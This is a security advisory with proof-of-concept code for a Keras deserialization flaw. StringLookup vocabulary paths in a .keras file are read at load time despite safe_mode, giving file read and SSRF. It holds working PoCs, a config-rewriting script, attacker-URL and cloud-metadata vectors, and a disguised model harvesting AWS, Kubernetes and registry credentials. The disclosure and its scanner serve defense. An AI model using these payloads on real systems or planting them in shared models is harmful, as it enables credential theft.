Author: Jayashwa Singh Chauhan
Date: 25 Sep 2025
Tested version: keras==3.11.3 (TensorFlow backend 2.20.0)
Status: Reproduced with multiple PoCs (A/B/C). Works with safe_mode=True.
Class: Deserialization side‑effect → Arbitrary File Read (LFI) and potential SSRF
Executive Summary
Keras allows StringLookup (implemented atop IndexLookup) to accept a file path (or URL‑like path) in its vocabulary argument. When such a model is loaded, Keras invokes TensorFlow's tf.io.gfile APIs to check and open the referenced path during deserialization—even with safe_mode=True and no custom_objects. As a result:
- A malicious .keras file can cause arbitrary local files (e.g., /etc/passwd, SSH keys) to be read at model load time and incorporated into the model state (retrievable via get_vocabulary() or by re‑saving the model).
- On builds where tf.io.gfile has HTTP/remote filesystem handlers enabled (e.g., via TensorFlow‑IO), the same vector can fetch from attacker‑controlled or internal endpoints (SSRF).
This behavior bypasses safe‑mode expectations and turns loading an untrusted model into a confidentiality risk, and in some environments a network exfiltration vector.
Key facts backed by upstream docs:
- StringLookup(vocabulary=...) accepts a string path to a text file. ([Keras][1])
- The Keras v3 .keras format is a zip that contains config.json, model.weights.h5, and metadata.json (a quick inspection snippet follows this list). ([Keras][2])
- keras.saving.load_model(..., safe_mode=True) is the default and is intended to block unsafe lambda deserialization. ([Keras][3])
- tf.io.gfile provides a filesystem‑abstracted API (local files, and—when supported/build‑enabled—GCS/HDFS/others; additional schemes often come from TensorFlow‑IO). ([TensorFlow][4])
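Because the .keras container is a plain zip, the archive-layout fact is easy to verify with the standard library; a minimal inspection snippet (the model path is illustrative):

# Quick look inside a .keras archive (path is illustrative)
import zipfile

with zipfile.ZipFile("model.keras") as zf:
    print(zf.namelist())  # typically: ['metadata.json', 'config.json', 'model.weights.h5']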
Affected Components & Versions
- Keras layers: keras.layers.StringLookup (backed by IndexLookup); likely also IntegerLookup (the same pattern accepts vocabularies), though our PoCs focused on strings. (IntegerLookup's public docs also permit supplying a vocabulary at construction.) ([Keras][5])
- Keras versions: Confirmed on 3.11.3 with TF 2.20.0. Older 3.x releases are very likely affected since the behavior stems from the vocabulary path design.
- Backends: Path resolution uses TensorFlow's tf.io.gfile (the layer itself is TF‑bound per docs), so the issue manifests on TF-backend loads; behavior on non‑TF backends depends on whether TF is still imported for this layer during deserialization. ([Keras][1])
- Environments: HTTP/remote schemes require builds with the corresponding filesystem plugins (often via tensorflow‑io); otherwise you'll still observe network probes (e.g., exists checks), but the actual fetch may raise "scheme not implemented" (a quick probe sketch follows this list). ([GitHub][6])
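To tell the two environments apart, the following is a minimal probe sketch (the helper name and the broad exception handling are ours, not a Keras/TensorFlow API); it simply asks tf.io.gfile whether it will even attempt an http:// path:

# Probe whether this TF build has an HTTP filesystem handler registered (hypothetical helper)
import tensorflow as tf

def http_scheme_supported(probe_url="http://127.0.0.1:9/does-not-exist"):
    try:
        tf.io.gfile.exists(probe_url)  # raises if no handler for the scheme is registered
        return True
    except tf.errors.UnimplementedError:
        return False
    except Exception:
        # Other errors (connection refused, not found, ...) mean a handler exists but the fetch failed.
        return True

print("http:// handled by tf.io.gfile:", http_scheme_supported())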
Threat Model
- Attacker capability: Can share a crafted .keras model (email, Git repo, model hub, internal share).
- Victim action: Loads the model in Python using keras.saving.load_model("model.keras") with defaults (safe_mode=True, compile=True|False).
- No custom code required: No lambdas or custom_objects needed.
- Effect at load time: File/URL is probed and may be opened/read; tokens appear in layer vocabulary immediately; if the model is re‑saved, the tokens can be embedded in the artifact.
Reproduction (PoCs)
All PoCs were executed on Ubuntu with:
- Python 3.10.12
- keras 3.11.3
- tensorflow 2.20.0
- tensorflow‑io present in some runs (for http:// support)
PoC A — Content embedding via file path
Goal: Passing a file path to StringLookup(vocabulary=...) reads the file; sentinel tokens appear in the vocabulary after load_model(..., safe_mode=True).
# PoC A (minimal)
import keras
from keras import layers, Model

path = "/tmp/vocab.txt"
with open(path, "w") as f:
    f.write("alpha\nbeta\nSECRET_TOKEN_123\ngamma\n")  # sentinel token planted in the "vocabulary" file

inp = layers.Input(shape=(1,), dtype="string")
lk = layers.StringLookup(vocabulary=path, name="sl")
model = Model(inp, lk(inp))
model.save("/tmp/pocA.keras")

loaded = keras.saving.load_model("/tmp/pocA.keras", safe_mode=True, compile=False)
print("VOCAB:", loaded.get_layer("sl").get_vocabulary())
# -> contains SECRET_TOKEN_123
Observed: SECRET_TOKEN_123 appears in get_vocabulary() immediately after load.
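As a follow-up sketch (building on PoC A; file names are illustrative), re-saving the loaded model and extracting again shows the sentinel travels with the artifact (the "persistence across saves" check referenced later in this report):

# PoC A follow-up: does the sentinel survive a re-save of the loaded model?
import keras

loaded = keras.saving.load_model("/tmp/pocA.keras", safe_mode=True, compile=False)
loaded.save("/tmp/pocA_resaved.keras")  # victim "retrains" / re-shares the artifact

# Optionally delete /tmp/vocab.txt first: if the token still appears after reloading,
# it is carried by the artifact itself rather than re-read from the original file.
reloaded = keras.saving.load_model("/tmp/pocA_resaved.keras", safe_mode=True, compile=False)
print("SECRET_TOKEN_123" in reloaded.get_layer("sl").get_vocabulary())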
PoC B — Load‑time file access (tracing tf.io.gfile)
Goal: Confirm file is accessed during deserialization (not lazily later).
# PoC B (trace load-time access)
import keras
import tensorflow as tf  # patching the real module is sufficient; Keras resolves tf.io.gfile lazily

orig_exists, orig_gfile = tf.io.gfile.exists, tf.io.gfile.GFile

def traced_exists(p):
    print("[TRACE exists]", p)
    return orig_exists(p)

def traced_open(p, *a, **kw):
    print("[TRACE open]", p)
    return orig_gfile(p, *a, **kw)

tf.io.gfile.exists, tf.io.gfile.GFile = traced_exists, traced_open

loaded = keras.saving.load_model("/tmp/pocA.keras", safe_mode=True, compile=False)
# Output includes probing/opening of the vocabulary file path during load
Observed sample output (from a fuller harness run; the traced path is whatever vocabulary file the loaded model references):
[TRACE exists] /home/ubuntu/Research/jay.txt
[+] PASS: Load-time file access confirmed for the target vocabulary file.
PoC C — URL vectors (file:// and http://)
Goal: Show the same mechanism dereferences URL‑style paths.
Method: Save a benign .keras, then edit config.json inside the ZIP to set StringLookup.config.vocabulary to a URL; trace load.
# Start a local server in another terminal:
# cd ~/Research && echo -e "one\nNET_TEST_TOKEN_456\nthree" > vocab_http.txt
# python3 -m http.server 8000
import json, zipfile, keras

src, dst = "/tmp/pocA.keras", "/tmp/pocC_http.keras"
url = "http://127.0.0.1:8000/vocab_http.txt"

with zipfile.ZipFile(src, "r") as zin:
    data = {n: zin.read(n) for n in zin.namelist()}

cfg = json.loads(data["config.json"])

def patch(o):
    # Recursively rewrite every StringLookup config so its vocabulary points at the URL
    if isinstance(o, dict):
        if o.get("class_name", "").endswith("StringLookup"):
            o["config"]["vocabulary"] = url
        for v in o.values():
            patch(v)
    elif isinstance(o, list):
        for v in o:
            patch(v)

patch(cfg)
data["config.json"] = json.dumps(cfg).encode()

with zipfile.ZipFile(dst, "w") as zout:
    for n, b in data.items():
        zout.writestr(n, b)

# Apply the tf.io.gfile tracing from PoC B, then load:
loaded = keras.saving.load_model(dst, safe_mode=True, compile=False)
Observed:
- file:// → exists/open calls confirmed during load.
- http:// → exists and open calls to the URL confirmed during load (network access at deserialization time).
- Without an HTTP filesystem plugin: the exists probe is still observed, followed by a "scheme not implemented" exception — still evidence of network probing at load.
Vulnerability Summary
- Affected Components: keras.layers.StringLookup, keras.layers.IntegerLookup (via the IndexLookup base class)
- Root Cause: Unconstrained file path evaluation in the set_vocabulary() method
- Attack Vector: Malicious .keras model files with external file paths in layer configuration
- Bypass: Circumvents safe_mode=True protections
Technical Analysis
1. Vulnerable Code Locations
Primary Vulnerability: /keras/src/layers/preprocessing/index_lookup.py
Lines 384-396: The Core Vulnerability
def set_vocabulary(self, vocabulary, idf_weights=None):
    # ... [parameter validation] ...
    if isinstance(vocabulary, str):  # ← String path detected
        if not tf.io.gfile.exists(vocabulary):  # ← LINE 385: FILE ACCESS!
            raise ValueError(
                f"Vocabulary file {vocabulary} does not exist."
            )
        if self.output_mode == "tf_idf":
            raise ValueError(
                "output_mode `'tf_idf'` does not support loading a "
                "vocabulary from file."
            )
        self.lookup_table = self._lookup_table_from_file(vocabulary)  # ← LINE 394: FILE READ!
        self._record_vocabulary_size()
        return
Lines 863-879: File Reading Implementation
def _lookup_table_from_file(self, filename):
    if self.invert:
        key_index = tf.lookup.TextFileIndex.LINE_NUMBER
        value_index = tf.lookup.TextFileIndex.WHOLE_LINE
    else:
        key_index = tf.lookup.TextFileIndex.WHOLE_LINE
        value_index = tf.lookup.TextFileIndex.LINE_NUMBER
    with tf.init_scope():
        initializer = tf.lookup.TextFileInitializer(  # ← FILE READ OPERATION
            filename=filename,  # ← ATTACKER-CONTROLLED PATH
            key_dtype=self._key_dtype,
            key_index=key_index,
            value_dtype=self._value_dtype,
            value_index=value_index,
            value_index_offset=self._token_start_index(),
        )
    return tf.lookup.StaticHashTable(initializer, self._default_value)
2. Execution Flow Analysis
Step 1: Model Loading Entry Point
File: /keras/src/saving/saving_api.py
def load_model(filepath, custom_objects=None, compile=True, safe_mode=None):
    # safe_mode defaults to True
    return saving_lib.load_model(
        filepath, custom_objects, compile, safe_mode=safe_mode
    )
Step 2: Archive Processing
File: /keras/src/saving/saving_lib.py:437-444
def _load_model_from_fileobj(fileobj, custom_objects, compile, safe_mode):
    with zipfile.ZipFile(fileobj, "r") as zf:
        with zf.open(_CONFIG_FILENAME, "r") as f:  # ← Read config.json
            config_json = f.read()
        model = _model_from_config(  # ← Parse and reconstruct model
            config_json, custom_objects, compile, safe_mode
        )
Step 3: Model Deserialization
File: /keras/src/saving/saving_lib.py:430-434
def _model_from_config(config_json, custom_objects, compile, safe_mode):
    config_dict = json.loads(config_json)
    with ObjectSharingScope():
        model = deserialize_keras_object(  # ← Deserialize layers
            config_dict, custom_objects, safe_mode=safe_mode
        )
    return model
Step 4: Layer Reconstruction
File: /keras/src/saving/serialization_lib.py
def deserialize_keras_object(config, custom_objects=None, safe_mode=None, **kwargs):
    # ... [class resolution] ...
    # For StringLookup layers:
    cls = _retrieve_class_or_fn(...)  # ← Gets StringLookup class
    # Calls StringLookup.from_config() or __init__()
    instance = cls.from_config(inner_config, custom_objects=custom_objects)
Step 5: StringLookup Initialization
File: /keras/src/layers/preprocessing/string_lookup.py:321-335
def __init__(self, max_tokens=None, ..., vocabulary=None, ...):
    # ...
    super().__init__(  # ← Calls IndexLookup.__init__()
        # ...
        vocabulary=vocabulary,  # ← ATTACKER-CONTROLLED PATH
        # ...
    )
Step 6: IndexLookup Initialization Triggers Vulnerability
File: /keras/src/layers/preprocessing/index_lookup.py
def __init__(self, ..., vocabulary=None, ...):
    # ... [setup] ...
    if vocabulary is not None:
        self.set_vocabulary(vocabulary, idf_weights)  # ← TRIGGERS FILE ACCESS
Step 7: File Access Execution
The set_vocabulary() method (lines 384-396) immediately:
- Checks if vocabulary is a string (attacker-controlled)
- Calls tf.io.gfile.exists(vocabulary) - FIRST FILE ACCESS
- Calls self._lookup_table_from_file(vocabulary) - SECOND FILE ACCESS
- _lookup_table_from_file() uses tf.lookup.TextFileInitializer(filename=vocabulary) - ACTUAL FILE READ
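For illustration, the same read can be reproduced outside Keras with the underlying TensorFlow primitives; a minimal sketch (paths and values are illustrative) showing that building the lookup table consumes the file's lines:

# Standalone illustration of the file read performed by _lookup_table_from_file()
import tensorflow as tf

with open("/tmp/demo_vocab.txt", "w") as f:
    f.write("alpha\nSECRET\nbeta\n")

init = tf.lookup.TextFileInitializer(
    filename="/tmp/demo_vocab.txt",
    key_dtype=tf.string, key_index=tf.lookup.TextFileIndex.WHOLE_LINE,
    value_dtype=tf.int64, value_index=tf.lookup.TextFileIndex.LINE_NUMBER,
)
table = tf.lookup.StaticHashTable(init, default_value=-1)  # file is read when the table is initialized
print(table.lookup(tf.constant(["SECRET"])).numpy())       # -> [1] (line number of the sentinel)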
3. Attack Vector Details
3.1. Configuration Injection
The vulnerability is triggered through malicious .keras archive contents:
config.json Structure:
{
  "layers": [
    {
      "class_name": "StringLookup",
      "config": {
        "name": "malicious_lookup",
        "vocabulary": "/etc/passwd",   ← ATTACKER INJECTION POINT
        "max_tokens": null,
        "num_oov_indices": 1
        // ... other configs
      }
    }
  ]
}
3.2. TensorFlow File API Abuse
The vulnerability leverages TensorFlow's tf.io.gfile API which supports:
- Local paths: /etc/passwd, C:\Windows\System32\drivers\etc\hosts
- File URLs: file:///etc/passwd
- Network URLs: http://attacker.com/steal, gs://bucket/file (if tensorflow-io installed)
- Cloud metadata: http://169.254.169.254/latest/meta-data/
3.3. Safe Mode Bypass Analysis
The vulnerability bypasses safe_mode=True because:
- Safe mode scope: Only blocks lambda deserialization in serialization_lib.py:656-666
- Built-in layer assumption: StringLookup is a "trusted" built-in layer
- File I/O not restricted: No validation of file paths in safe mode (a pre-load scan, sketched below, can serve as a stopgap)
- Design gap: Safe mode focuses on code execution, not I/O operations
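Because safe mode never inspects these values, a practical stopgap is to scan config.json for path-like vocabulary entries before calling load_model(). A minimal, hedged sketch (the helper name and heuristic are ours, not a Keras API):

# Hypothetical pre-load check: flag lookup layers whose vocabulary is a string (path/URL)
import json, zipfile

def suspicious_vocabularies(keras_path):
    hits = []
    with zipfile.ZipFile(keras_path) as zf:
        cfg = json.loads(zf.read("config.json"))
    def walk(node):
        if isinstance(node, dict):
            if node.get("class_name", "").endswith(("StringLookup", "IntegerLookup", "IndexLookup")):
                vocab = node.get("config", {}).get("vocabulary")
                if isinstance(vocab, str):  # a list of tokens is fine; a string is a path/URL
                    hits.append((node.get("config", {}).get("name"), vocab))
            for v in node.values():
                walk(v)
        elif isinstance(node, list):
            for v in node:
                walk(v)
    walk(cfg)
    return hits

print(suspicious_vocabularies("/tmp/pocC_http.keras"))  # expected: [('sl', 'http://127.0.0.1:8000/vocab_http.txt')]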
Threat Scenario: Malicious .keras Model on Hugging Face
Let's say you're an attacker. You create a malicious .keras model that abuses the vocabulary mechanism we discovered. Then you upload it to Hugging Face Hub (or any model-sharing platform).
Here's how the end-to-end flow unfolds:
1. Attacker Creates a Malicious Model
The attacker builds a model with a StringLookup layer like:
lookup = layers.StringLookup(vocabulary="/etc/passwd")
or
lookup = layers.StringLookup(vocabulary="http://attacker.com/collect.txt")
This is not code injection — it's a normal, valid Keras layer.
The malicious part is the vocabulary pointing to a sensitive file or a remote server.
The attacker saves the model:
model.save("malicious_model.keras")
This .keras file contains config.json that looks like:
{
  "class_name": "StringLookup",
  "config": {
    "vocabulary": "/etc/passwd",
    ...
  }
}
They upload malicious_model.keras to Hugging Face.
2. Victim Downloads and Loads the Model
A data scientist, ML engineer, or researcher downloads the model from Hugging Face:
from keras import saving
model = saving.load_model("malicious_model.keras", safe_mode=True)
They trust the model because:
- It's from a public model hub.
- It loads without needing custom_objects.
- They used safe_mode=True (thinking it's secure).
3. Trigger: Deserialization Causes File/Network Access
Here's the critical moment:
- As soon as load_model() runs, Keras starts reconstructing the layers based on config.json.
- It sees vocabulary is a path or URL, and calls tf.io.gfile.exists() and GFile() on it — before any inference code runs.
This means:
- If the vocabulary is /etc/passwd → the model reads your system file immediately.
- If it's file:///home/ubuntu/.ssh/id_rsa → it attempts to read your SSH key.
- If it's http://attacker.com/collect → your machine tries to fetch that URL, revealing your IP, environment, and possibly internal network routes.
- If it's http://169.254.169.254/latest/meta-data/ (cloud metadata service) → it could steal AWS/GCP instance credentials.
All of this happens silently during model load — the user hasn't even called .predict() yet.
4. Data Can Be Embedded or Exfiltrated
Two outcomes are possible depending on how the malicious model is built:
Local File Stealing (LFI)
- The file's contents are read and inserted into the layer's vocabulary.
- Anyone who later calls vocab = model.get_layer("lookup").get_vocabulary() will see sensitive tokens (like lines from /etc/passwd) now embedded in the model.
- If they re-save the model and upload it somewhere (e.g., retrained version), those sensitive tokens get exfiltrated.
Remote Callback (SSRF / Exfiltration)
- If HTTP filesystem support is enabled (tensorflow-io or custom build), the model can make a network request to attacker infrastructure.
- That request may include:
- Sensitive query parameters (if attacker encoded them)
- Internal network responses (if SSRF targets internal services)
- Metadata credentials (e.g., AWS/GCP metadata endpoints)
This is even more dangerous because:
- It happens invisibly, during deserialization.
- It does not require model inference or user code.
- It bypasses safe_mode protections.
5. Downstream Impact on the End User
| Scenario | Impact |
| --- | --- |
| Local machine | Sensitive files like SSH keys, API tokens, or OS user data may be embedded in the model |
| Cloud environment | Metadata tokens from AWS/GCP/OCI endpoints can be accessed — possible cloud account compromise |
| Corporate network | SSRF may let the attacker pivot into internal services, scan ports, or exfiltrate network topology |
| CI/CD systems | Pipeline secrets or build credentials could leak if the model is used during automated deployments |
| Model redistribution | Sensitive tokens embedded in the vocabulary may be unintentionally leaked if the model is re-shared |
Realistic Example
- Attacker uploads malicious_model.keras to Hugging Face.
- Victim loads it in a Jupyter notebook with safe_mode=True.
- During deserialization: /home/ubuntu/.ssh/id_rsa is read and added as a vocabulary token, OR http://169.254.169.254/latest/meta-data/ is contacted.
- Victim trains further and re-uploads the model.
- Attacker downloads it and calls .get_vocabulary() → now they have the victim's SSH key or metadata secrets.
Key Takeaways for End Users
- Deserialization is not passive – loading a model can trigger file or network access before you execute any code.
- Safe mode is insufficient – it blocks arbitrary bytecode, not dangerous file paths or URLs in built-in layers.
- Public models should never be trusted blindly – loading them without sandboxing is equivalent to executing untrusted code.
- Even non-malicious workflows can leak data – if vocabulary references are left pointing to sensitive files, that data becomes part of the model state.
Enterprise Threat Scenario: Insider Data Exfiltration
How the Attack Works (High-Level)
- **Malicious Model Creation**: Insider builds a model that uses a lookup layer with vocabulary pointing at sensitive files:
  - /home/service/.aws/credentials - Cloud access keys
  - .npmrc - Package registry tokens
  - ~/.kube/config - Kubernetes cluster access
  - /etc/ssl/private/server.key - TLS private keys
  - Application config files with database passwords
- **Publication**: They save and publish the .keras file to an internal registry or model hub
- **Legitimate Loading**: A pipeline or colleague loads the model (often with safe_mode=True, no custom objects)
- **Automatic Exfiltration**: During deserialization, Keras resolves the vocabulary:
  - Local path: Reads the file contents immediately
  - URL (if the TF build supports it): Attempts a network fetch to attacker infrastructure
  - File contents become part of model state (lookup vocabulary)
- **Data Extraction**: The insider (or any attacker with access to the resulting .keras file) can later:
  - Load the model and call get_vocabulary() on the lookup layer
  - Inspect weights/assets in the archive to extract embedded secrets
Why This Is Impactful Even Without RCE
- 0-click data exposure at load time - no user interaction required
- Secrets persist inside the artifact and leak later when model is re-shared, archived, or debugged
- Bypasses code-review guardrails - rides on allowed, built-in layer behavior
- Steganographic hiding - sensitive data hidden in legitimate ML artifacts
- Supply chain contamination - malicious models can propagate through ML pipelines
Real-World Attack Examples
# Enterprise credential harvesting model
model = keras.Sequential([
    layers.Input(shape=(1,), dtype="string"),
    # Cloud credentials
    layers.StringLookup(vocabulary="/home/jenkins/.aws/credentials", name="aws"),
    layers.StringLookup(vocabulary="/home/jenkins/.azure/azureProfile.json", name="azure"),
    # Container orchestration
    layers.StringLookup(vocabulary="/home/jenkins/.kube/config", name="k8s"),
    # Package management
    layers.StringLookup(vocabulary="/home/jenkins/.npmrc", name="npm"),
    layers.StringLookup(vocabulary="/home/jenkins/.pypirc", name="pypi"),
    # Application secrets
    layers.StringLookup(vocabulary="/opt/app/config/database.yml", name="db"),
    # Normal model layers to maintain cover
    layers.Dense(64, activation="relu"),
    layers.Dense(1, activation="sigmoid"),
])
model.save("recommendation_model_v3.keras")  # Appears legitimate
Evidence for Security Analysis
To demonstrate the full impact, security teams should document:
- Load → Extract: Show load_model() → get_vocabulary() contains known sentinels from sensitive files (a harness sketch follows this list)
- Persistence across saves: Re-save the loaded model and perform a second extraction to show the data persists
- OS-level confirmation: Use strace or auditd to confirm file opens during load_model()
- Network attempts: Show that a URL-based vocabulary triggers network requests (if the TF build supports it)
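A compact harness along these lines can automate the first two checks; this is a sketch only (the layer discovery and sentinel list are ours, built around the PoC A artifact):

# Sketch: collect vocabularies from all lookup layers before/after a re-save and grep for sentinels
import keras

SENTINELS = ["SECRET_TOKEN_123", "root:x:"]  # markers expected from planted files / /etc/passwd

def extract_vocabularies(model):
    found = {}
    for layer in model.layers:
        if hasattr(layer, "get_vocabulary"):
            found[layer.name] = layer.get_vocabulary()
    return found

def check(path):
    model = keras.saving.load_model(path, safe_mode=True, compile=False)
    for name, vocab in extract_vocabularies(model).items():
        leaked = [t for t in vocab if any(s in str(t) for s in SENTINELS)]
        if leaked:
            print(f"[!] {path}: layer '{name}' contains {leaked}")
    # Persistence: re-save and return the new artifact for a second pass.
    resaved_path = path + ".resaved.keras"
    model.save(resaved_path)
    return resaved_path

resaved = check("/tmp/pocA.keras")
check(resaved)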